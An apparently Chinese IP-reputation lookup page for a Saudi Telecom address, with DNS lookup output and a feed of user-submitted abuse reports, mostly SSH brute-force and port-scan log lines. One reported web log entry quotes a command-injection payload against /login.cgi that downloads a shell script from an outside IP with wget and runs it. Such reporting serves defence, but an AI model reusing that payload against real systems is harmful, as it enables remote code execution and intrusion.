94.49.57.6 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Saudi Arabia

运营商(isp): Saudi Telecom Company JSC

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attack	proto=tcp . spt=48282 . dpt=25 . (listed on Blocklist de Sep 12) (414)	2019-09-13 20:21:51

相同子网IP讨论:

IP	类型	评论内容	时间
94.49.57.43	attackspambots	2019-07-08 08:16:10 1hkMwb-00069Z-VO SMTP connection from \(\[94.49.57.43\]\) \[94.49.57.43\]:19379 I=\[193.107.88.166\]:25 closed by DROP in ACL 2019-07-08 08:16:23 1hkMwo-00069m-MB SMTP connection from \(\[94.49.57.43\]\) \[94.49.57.43\]:19486 I=\[193.107.88.166\]:25 closed by DROP in ACL 2019-07-08 08:16:35 1hkMx0-00069u-Gt SMTP connection from \(\[94.49.57.43\]\) \[94.49.57.43\]:19590 I=\[193.107.88.166\]:25 closed by DROP in ACL ...	2019-10-24 20:57:52

类型

评论内容

时间

94.49.57.43

attackspambots

2019-07-08 08:16:10 1hkMwb-00069Z-VO SMTP connection from \(\[94.49.57.43\]\) \[94.49.57.43\]:19379 I=\[193.107.88.166\]:25 closed by DROP in ACL
2019-07-08 08:16:23 1hkMwo-00069m-MB SMTP connection from \(\[94.49.57.43\]\) \[94.49.57.43\]:19486 I=\[193.107.88.166\]:25 closed by DROP in ACL
2019-07-08 08:16:35 1hkMx0-00069u-Gt SMTP connection from \(\[94.49.57.43\]\) \[94.49.57.43\]:19590 I=\[193.107.88.166\]:25 closed by DROP in ACL
...

2019-10-24 20:57:52

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 94.49.57.6
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 32867
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;94.49.57.6.			IN	A

;; AUTHORITY SECTION:
.			3600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019091300 1800 900 604800 86400

;; Query time: 2 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Fri Sep 13 20:21:46 CST 2019
;; MSG SIZE  rcvd: 114

HOST信息:

Host 6.57.49.94.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		67.207.67.2
Address:	67.207.67.2#53

** server can't find 6.57.49.94.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
125.75.128.231	attackbots	MultiHost/MultiPort Probe, Scan, Hack -	2019-11-25 09:29:10
123.144.23.251	attackspambots	1574636145 - 11/24/2019 23:55:45 Host: 123.144.23.251/123.144.23.251 Port: 6001 TCP Blocked	2019-11-25 09:07:37
51.38.237.214	attackspam	2019-11-25T01:27:34.542495abusebot-5.cloudsearch.cf sshd\[21993\]: Invalid user test from 51.38.237.214 port 37436	2019-11-25 09:28:17
158.69.137.130	attackbots	Nov 25 06:53:37 taivassalofi sshd[197045]: Failed password for root from 158.69.137.130 port 53774 ssh2 Nov 25 06:59:45 taivassalofi sshd[197147]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=158.69.137.130 ...	2019-11-25 13:03:00
24.140.49.7	attackbotsspam	Nov 24 18:51:22 php1 sshd\[14030\]: Invalid user netscreen from 24.140.49.7 Nov 24 18:51:22 php1 sshd\[14030\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=24.140.49.7 Nov 24 18:51:24 php1 sshd\[14030\]: Failed password for invalid user netscreen from 24.140.49.7 port 53388 ssh2 Nov 24 18:59:27 php1 sshd\[14675\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=24.140.49.7 user=root Nov 24 18:59:29 php1 sshd\[14675\]: Failed password for root from 24.140.49.7 port 33360 ssh2	2019-11-25 13:11:44
103.81.87.204	attack	Invalid user temp1 from 103.81.87.204 port 53466	2019-11-25 09:31:08
175.212.62.83	attackspam	Brute-force attempt banned	2019-11-25 13:12:33
218.92.0.139	attackspam	Nov 25 06:11:53 odroid64 sshd\[17303\]: User root from 218.92.0.139 not allowed because not listed in AllowUsers Nov 25 06:11:54 odroid64 sshd\[17303\]: Failed none for invalid user root from 218.92.0.139 port 28247 ssh2 ...	2019-11-25 13:13:07
112.85.42.176	attack	Nov 25 06:04:07 lnxded63 sshd[18599]: Failed password for root from 112.85.42.176 port 40669 ssh2 Nov 25 06:04:10 lnxded63 sshd[18599]: Failed password for root from 112.85.42.176 port 40669 ssh2 Nov 25 06:04:13 lnxded63 sshd[18599]: Failed password for root from 112.85.42.176 port 40669 ssh2 Nov 25 06:04:16 lnxded63 sshd[18599]: Failed password for root from 112.85.42.176 port 40669 ssh2	2019-11-25 13:10:10
106.12.10.203	attackbotsspam	106.12.10.203 - - [24/Nov/2019:23:55:37 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://54.37.74.232/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0" ...	2019-11-25 09:12:14
153.37.97.184	attack	Nov 25 01:59:46 ws19vmsma01 sshd[198193]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=153.37.97.184 Nov 25 01:59:48 ws19vmsma01 sshd[198193]: Failed password for invalid user home from 153.37.97.184 port 50709 ssh2 ...	2019-11-25 13:00:55
41.223.4.155	attackbots	Nov 25 05:59:35 srv206 sshd[6450]: Invalid user webmaster from 41.223.4.155 Nov 25 05:59:35 srv206 sshd[6450]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=41.223.4.155 Nov 25 05:59:35 srv206 sshd[6450]: Invalid user webmaster from 41.223.4.155 Nov 25 05:59:37 srv206 sshd[6450]: Failed password for invalid user webmaster from 41.223.4.155 port 47712 ssh2 ...	2019-11-25 13:09:10
190.75.56.19	attackbots	port scan and connect, tcp 1433 (ms-sql-s)	2019-11-25 09:13:32
178.128.59.109	attackbotsspam	Nov 25 01:00:56 sinope sshd[19797]: Invalid user allegweb from 178.128.59.109 Nov 25 01:00:56 sinope sshd[19797]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.128.59.109 Nov 25 01:00:58 sinope sshd[19797]: Failed password for invalid user allegweb from 178.128.59.109 port 42286 ssh2 Nov 25 01:00:58 sinope sshd[19797]: Received disconnect from 178.128.59.109: 11: Bye Bye [preauth] Nov 25 01:37:44 sinope sshd[19917]: Invalid user lorelai from 178.128.59.109 Nov 25 01:37:44 sinope sshd[19917]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.128.59.109 Nov 25 01:37:46 sinope sshd[19917]: Failed password for invalid user lorelai from 178.128.59.109 port 36722 ssh2 Nov 25 01:37:46 sinope sshd[19917]: Received disconnect from 178.128.59.109: 11: Bye Bye [preauth] Nov 25 01:44:54 sinope sshd[19933]: Invalid user cclincs from 178.128.59.109 Nov 25 01:44:54 sinope sshd[19933]: pam_unix(ss........ -------------------------------	2019-11-25 09:08:09
222.186.180.147	attack	F2B jail: sshd. Time: 2019-11-25 02:16:42, Reported by: VKReport	2019-11-25 09:20:04

最近上报的IP列表

122.191.225.3	119.93.245.103	49.49.194.103	213.195.101.59
157.245.74.221	105.112.121.103	103.121.243.108	217.112.128.43
77.87.212.34	69.94.133.136	5.141.26.122	192.161.90.114
92.194.116.109	45.179.253.137	42.188.103.118	160.195.99.222
215.184.102.171	211.192.25.132	183.91.215.47	183.83.73.140